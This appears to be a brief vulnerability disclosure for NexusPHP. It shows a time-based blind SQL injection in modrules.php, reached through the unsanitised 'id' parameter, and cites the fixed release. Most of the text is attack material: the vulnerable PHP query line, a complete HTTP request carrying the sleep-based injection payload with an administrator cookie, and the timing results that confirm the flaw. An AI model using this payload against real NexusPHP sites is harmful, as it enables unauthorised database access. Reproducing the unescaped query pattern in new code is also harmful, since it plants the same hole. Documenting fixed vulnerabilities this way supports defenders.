Need get the administrator's identity to complete the attack.
fixed version: nexusphp v1.6.0-beta2 https://github.com/xiaomlove/nexusphp/releases
Software Download Link: http://sourceforge.net/projects/nexusphp/
Github Repository https://github.com/xiaomlove/nexusphp
$res = @mysql_fetch_array(@sql_query("select * from rules where id='$id'"));
GET /modrules.php?act=edit&id=1%27%20and%20sleep(2)%23 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: administrator_cookies
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
/modrules.php?act=edit&id=1%27%20and%20sleep(2)%23
The return will be delayed for 2 seconds
/modrules.php?act=edit&id=1%27%20and%20sleep(0)%23
The return will be delayed for 0 seconds